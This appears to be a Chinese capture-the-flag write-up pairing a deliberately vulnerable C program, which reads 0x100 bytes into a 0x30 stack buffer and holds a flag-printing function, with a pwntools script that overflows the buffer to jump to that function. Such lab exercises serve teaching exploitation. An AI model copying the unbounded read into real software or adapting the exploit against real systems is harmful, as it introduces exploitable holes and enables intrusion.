源代码:
[pre]#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
int main()
{
char buf[0x30];
memset(&buf,0,0x30);
setvbuf(stdout, 0, 2, 0);
setvbuf(stdin, 0, 1, 0);
printf("say something?\n");
read(0,buf,0x100);
printf("oh,that's so boring!\n");
return 0;
}
void get_shell_()
{
puts("tql~tql~tql~tql~tql~tql~tql");
puts("this is your flag!");
system("cat flag");
}
//编译时用命令:
//gcc -z execstack -fno-stack-protector -o stack1 stack1.c[/pre]exp:
[pre]#encoding:utf-8
#!/upr/bin/env python
from pwn import *
p = process("./stack1")
getshell=0x400751
payload = "a"*0x38+p64(getshell)
p.send(payload)
p.interactive()[/pre]
|